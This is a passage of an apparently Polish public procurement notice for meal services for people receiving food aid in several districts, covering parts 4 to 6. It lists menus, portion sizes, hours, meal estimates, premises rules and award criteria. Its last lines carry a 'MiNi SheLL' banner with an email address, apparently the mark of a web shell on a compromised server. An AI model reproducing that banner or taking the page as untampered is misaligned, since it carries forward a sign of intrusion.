.posiłki muszą być przygotowywane ze świeżych artykułów spożywczych posiadających aktualne terminy przydatności do spożycia, zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego,
.posiłki mogą być dowożone do miejsca ich wydania,
.Wykonawca w przypadku dowożenia posiłków do miejsca wydawania, zobowiązany jest do posiadania atestowanych termosów gwarantujących utrzymanie odpowiedniej temperatury oraz jakości przewożonych potraw,
.usługa powinna być wykonywana w godz. 12.00-16.00 od poniedziałku do piątku (bez sobót, niedziel oraz dni ustawowo określonych jako świąteczne),
.wydawanie posiłków odbywać się będzie dla osób objętych dożywianiem poza kolejnością,
.Wykonawca ma obowiązek wydania posiłku do pojemnika zapewnionego przez podopiecznego, pod warunkiem jednak, że pojemnik przeznaczony jest do tego celu,
.skład posiłków winien być podawany do wiadomości podopiecznych w jadłospisie, sporządzanym odrębnie na każdy dzień,
.szacunkowo dziennie wydawanych będzie ok. 82 posiłki, w ciągu trwania całej umowy - ok. 10496 posiłków. Zamawiający zastrzega, iż podana ilość posiłków w okresie obowiązywania umowy ma charakter orientacyjny, służący tylko dla porównania ofert i tym samym nie stanowi dla zamawiającego zobowiązania do zakupu w podanej ilości.  
.miejsce wykonywania usługi posiadać musi infrastrukturę techniczną i lokalową niezbędną do spożywania posiłków w lokalu,
.lokal musi znajdować się w danej dzielnicy,
.wymagane jest, aby lokal był dopuszczony do prowadzenia działalności w przedmiotowym zakresie przez odpowiednie służby sanitarne oraz spełniał warunki wynikające z przepisów dotyczących ochrony przeciwpożarowej i przepisów ustawy z dnia 7 lipca 1994 roku Prawo Budowlane (z 2010 roku, Nr 243, poz. 1623 z późn. zm),
.zamawiający informuje, iż część posiłków - szacunkowo ok. 20 % winno być przygotowane jako posiłki dietetyczne - zgodnie ze wskazaniami lekarza. O sytuacji takiej zamawiający poinformuje wykonawcę w treści decyzji administracyjnej nie później niż na 7 dni przed rozpoczęciem świadczenia usługi. Składniki z których posiłek taki będzie przygotowany jak i gramatura posiłku  winna być tożsama jak w przypadku posiłku zwykłego.
.Wykonawca zobowiązany będzie do utylizacji resztek i odpadów pokonsumpcyjnych.
.Zamawiający dopuszcza możliwość utworzenia więcej niż 1 punktu  żywieniowego w obrębie jednego podzadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Podzadanie Nr 4 - dzielnica Sobięcin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Żywienie dorosłych odbywać się będzie od poniedziałku do piątku przez cały okres realizacji zamówienia. Posiłki muszą zawierać nie mniej niż 1000 kcal.
Posiłki muszą być jednodaniowe. W okresie tygodniowym skład posiłków ma przedstawiać się następująco:
.1 posiłek - ziemniaki, kasza lub ryż, mięso ( drobiowe, lub wieprzowe lub wołowe) surówka lub jarzyna, kompot lub kisiel,
.1 posiłek - ziemniaki, ryba (np. typu  dorsz lub mintaj itp.,  surówka lub jarzyna, kompot lub kisiel,
.2 posiłki - danie mączne (np.: pierogi lub makaron z sosem lub naleśniki lub placki lub łazanki,  kompot lub kisiel
.1 posiłek - zupa  z wkładką (kiełbasa lub mięso: drobiowe lub wieprzowe,  chleb),
przy czym poszczególne składniki posiłków powinny zawierać co najmniej następujące ilości:
.zupa - 350 ml,
.ziemniaki, kasza, ryż - 300 g,
.mięso - 150 g,
.ryba - 150 g,
.danie mączne - 400 g,
.surówka - 100 g,
.jarzyna - 100 g,
.kompot lub kisiel - 200 ml,
.mięso lub kiełbasa stanowiące  wkładkę do zupy - 100 g,
.chleb (do 4 kromek)
Inne wymagania, które musi spełniać wykonawca:
.Zamawiający nie dopuszcza powtarzalności posiłków w ciągu tygodnia,
.posiłki muszą być przygotowywane ze świeżych artykułów spożywczych posiadających aktualne terminy przydatności do spożycia, zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego,
.posiłki mogą być dowożone do miejsca ich wydania,
.Wykonawca w przypadku dowożenia posiłków do miejsca wydawania, zobowiązany jest do posiadania atestowanych termosów gwarantujących utrzymanie odpowiedniej temperatury oraz jakości przewożonych potraw,
.usługa powinna być wykonywana w godz. 12.00-16.00 od poniedziałku do piątku (bez sobót, niedziel oraz dni ustawowo określonych jako świąteczne),
.wydawanie posiłków odbywać się będzie dla osób objętych dożywianiem poza kolejnością,
.Wykonawca ma obowiązek wydania posiłku do pojemnika zapewnionego przez podopiecznego, pod warunkiem jednak, że pojemnik przeznaczony jest do tego celu,
.skład posiłków winien być podawany do wiadomości podopiecznych w jadłospisie, sporządzanym odrębnie na każdy dzień,
.szacunkowo dziennie wydawanych będzie ok. 75 posiłków, w ciągu trwania całej umowy - ok. 9600 posiłków. Zamawiający zastrzega, iż podana ilość posiłków w okresie obowiązywania umowy ma charakter orientacyjny, służący tylko dla porównania ofert i tym samym nie stanowi dla zamawiającego zobowiązania do zakupu w podanej ilości.  
.miejsce wykonywania usługi posiadać musi infrastrukturę techniczną i lokalową niezbędną do spożywania posiłków w lokalu,
.lokal musi znajdować się w danej dzielnicy,
.wymagane jest, aby lokal był dopuszczony do prowadzenia działalności w przedmiotowym zakresie przez odpowiednie służby sanitarne oraz spełniał warunki wynikające z przepisów dotyczących ochrony przeciwpożarowej i przepisów ustawy z dnia 7 lipca 1994 roku Prawo Budowlane (z 2010 roku, Nr 243, poz. 1623 z późn. zm),
.zamawiający informuje, iż część posiłków - szacunkowo ok. 20 % winno być przygotowane jako posiłki dietetyczne - zgodnie ze wskazaniami lekarza. O sytuacji takiej zamawiający poinformuje wykonawcę w treści decyzji administracyjnej nie później niż na 7 dni przed rozpoczęciem świadczenia usługi. Składniki z których posiłek taki będzie przygotowany jak i gramatura posiłku  winna być tożsama jak w przypadku posiłku zwykłego.
.Wykonawca zobowiązany będzie do utylizacji resztek i odpadów pokonsumpcyjnych.
.Zamawiający dopuszcza możliwość utworzenia więcej niż 1 punktu  żywieniowego w obrębie jednego podzadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Podzadanie Nr 5 - dzielnica Podgórze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Żywienie dorosłych odbywać się będzie od poniedziałku do piątku przez cały okres realizacji zamówienia. Posiłki muszą zawierać nie mniej niż 1000 kcal.
Posiłki muszą być jednodaniowe. W okresie tygodniowym skład posiłków ma przedstawiać się następująco:
.1 posiłek - ziemniaki, kasza lub ryż, mięso ( drobiowe, lub wieprzowe lub wołowe) surówka lub jarzyna, kompot lub kisiel,
.	1 posiłek - ziemniaki, ryba (np. typu  dorsz lub mintaj itp.,  surówka lub jarzyna, kompot lub kisiel,
.2 posiłki - danie mączne (np.: pierogi lub makaron z sosem lub naleśniki lub placki lub łazanki,  kompot lub kisiel
.1 posiłek - zupa  z wkładką (kiełbasa lub mięso: drobiowe lub wieprzowe,  chleb),
przy czym poszczególne składniki posiłków powinny zawierać co najmniej następujące ilości:
.zupa - 350 ml,
.ziemniaki, kasza, ryż - 300 g,
.mięso - 150 g,
.ryba - 150 g,
.danie mączne - 400 g,
.surówka - 100 g,
.jarzyna - 100 g,
.kompot lub kisiel - 200 ml,
.mięso lub kiełbasa stanowiące  wkładkę do zupy - 100 g,
.chleb (do 4 kromek)
Inne wymagania, które musi spełniać wykonawca:
.Zamawiający nie dopuszcza powtarzalności posiłków w ciągu tygodnia,
.posiłki muszą być przygotowywane ze świeżych artykułów spożywczych posiadających aktualne terminy przydatności do spożycia, zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego,
.posiłki mogą być dowożone do miejsca ich wydania,
.Wykonawca w przypadku dowożenia posiłków do miejsca wydawania, zobowiązany jest do posiadania atestowanych termosów gwarantujących utrzymanie odpowiedniej temperatury oraz jakości przewożonych potraw,
.usługa powinna być wykonywana w godz. 12.00-16.00 od poniedziałku do piątku (bez sobót, niedziel oraz dni ustawowo określonych jako świąteczne),
.wydawanie posiłków odbywać się będzie dla osób objętych dożywianiem poza kolejnością,
.Wykonawca ma obowiązek wydania posiłku do pojemnika zapewnionego przez podopiecznego, pod warunkiem jednak, że pojemnik przeznaczony jest do tego celu,
.skład posiłków winien być podawany do wiadomości podopiecznych w jadłospisie, sporządzanym odrębnie na każdy dzień,
.szacunkowo dziennie wydawanych będzie ok. 87 posiłków, w ciągu trwania całej umowy - ok. 11.136 posiłków. Zamawiający zastrzega, iż podana ilość posiłków w okresie obowiązywania umowy ma charakter orientacyjny, służący tylko dla porównania ofert i tym samym nie stanowi dla zamawiającego zobowiązania do zakupu w podanej ilości.  
.miejsce wykonywania usługi posiadać musi infrastrukturę techniczną i lokalową niezbędną do spożywania posiłków w lokalu,
.lokal musi znajdować się w danej dzielnicy,
.wymagane jest, aby lokal był dopuszczony do prowadzenia działalności w przedmiotowym zakresie przez odpowiednie służby sanitarne oraz spełniał warunki wynikające z przepisów dotyczących ochrony przeciwpożarowej i przepisów ustawy z dnia 7 lipca 1994 roku Prawo Budowlane (z 2010 roku, Nr 243, poz. 1623 z późn. zm),
.zamawiający informuje, iż część posiłków - szacunkowo ok. 20 % winno być przygotowane jako posiłki dietetyczne - zgodnie ze wskazaniami lekarza. O sytuacji takiej zamawiający poinformuje wykonawcę w treści decyzji administracyjnej nie później niż na 7 dni przed rozpoczęciem świadczenia usługi. Składniki z których posiłek taki będzie przygotowany jak i gramatura posiłku  winna być tożsama jak w przypadku posiłku zwykłego.
.Wykonawca zobowiązany będzie do utylizacji resztek i odpadów pokonsumpcyjnych.
.Zamawiający dopuszcza możliwość utworzenia więcej niż 1 punktu  żywieniowego w obrębie jednego podzadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Podzadanie Nr 6 - dzielnica Nowe Miasto.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Żywienie dorosłych odbywać się będzie od poniedziałku do piątku przez cały okres realizacji zamówienia. Posiłki muszą zawierać nie mniej niż 1000 kcal.
Posiłki muszą być jednodaniowe. W okresie tygodniowym skład posiłków ma przedstawiać się następująco:
.1 posiłek - ziemniaki, kasza lub ryż, mięso ( drobiowe, lub wieprzowe lub wołowe) surówka lub jarzyna, kompot lub kisiel,
.1 posiłek - ziemniaki, ryba (np. typu  dorsz lub mintaj itp.,  surówka lub jarzyna, kompot lub kisiel,
.2 posiłki - danie mączne (np.: pierogi lub makaron z sosem lub naleśniki lub placki lub łazanki,  kompot lub kisiel
.1 posiłek - zupa  z wkładką (kiełbasa lub mięso: drobiowe lub wieprzowe,  chleb),
przy czym poszczególne składniki posiłków powinny zawierać co najmniej następujące ilości:
.zupa - 350 ml,
.ziemniaki, kasza, ryż - 300 g,
.mięso - 150 g,
.ryba - 150 g,
.danie mączne - 400 g,
.surówka - 100 g,
.jarzyna - 100 g,
.kompot lub kisiel - 200 ml,
.mięso lub kiełbasa stanowiące  wkładkę do zupy - 100 g,
.chleb (do 4 kromek)
Inne wymagania, które musi spełniać wykonawca:
.Zamawiający nie dopuszcza powtarzalności posiłków w ciągu tygodnia,
.posiłki muszą być przygotowywane ze świeżych artykułów spożywczych posiadających aktualne terminy przydatności do spożycia, zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego,
.posiłki mogą być dowożone do miejsca ich wydania,
.Wykonawca w przypadku dowożenia posiłków do miejsca wydawania, zobowiązany jest do posiadania atestowanych termosów gwarantujących utrzymanie odpowiedniej temperatury oraz jakości przewożonych potraw,
.usługa powinna być wykonywana w godz. 12.00-16.00 od poniedziałku do piątku (bez sobót, niedziel oraz dni ustawowo określonych jako świąteczne),
.wydawanie posiłków odbywać się będzie dla osób objętych dożywianiem poza kolejnością,
.Wykonawca ma obowiązek wydania posiłku do pojemnika zapewnionego przez podopiecznego, pod warunkiem jednak, że pojemnik przeznaczony jest do tego celu,
.skład posiłków winien być podawany do wiadomości podopiecznych w jadłospisie, sporządzanym odrębnie na każdy dzień,
.szacunkowo dziennie wydawanych będzie ok. 172 posiłków, w ciągu trwania całej umowy - ok. 22.016 posiłków. Zamawiający zastrzega, iż podana ilość posiłków w okresie obowiązywania umowy ma charakter orientacyjny, służący tylko dla porównania ofert i tym samym nie stanowi dla zamawiającego zobowiązania do zakupu w podanej ilości.  
.miejsce wykonywania usługi posiadać musi infrastrukturę techniczną i lokalową niezbędną do spożywania posiłków w lokalu,
.lokal musi znajdować się w danej dzielnicy,
.wymagane jest, aby lokal był dopuszczony do prowadzenia działalności w przedmiotowym zakresie przez odpowiednie służby sanitarne oraz spełniał warunki wynikające z przepisów dotyczących ochrony przeciwpożarowej i przepisów ustawy z dnia 7 lipca 1994 roku Prawo Budowlane (z 2010 roku, Nr 243, poz. 1623 z późn. zm),
.zamawiający informuje, iż część posiłków - szacunkowo ok. 20 % winno być przygotowane jako posiłki dietetyczne - zgodnie ze wskazaniami lekarza. O sytuacji takiej zamawiający poinformuje wykonawcę w treści decyzji administracyjnej nie później niż na 7 dni przed rozpoczęciem świadczenia usługi. Składniki z których posiłek taki będzie przygotowany jak i gramatura posiłku  winna być tożsama jak w przypadku posiłku zwykłego.
.Wykonawca zobowiązany będzie do utylizacji resztek i odpadów pokonsumpcyjnych.
.Zamawiający dopuszcza możliwość utworzenia więcej niż 1 punktu  żywieniowego w obrębie jednego podzadania..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com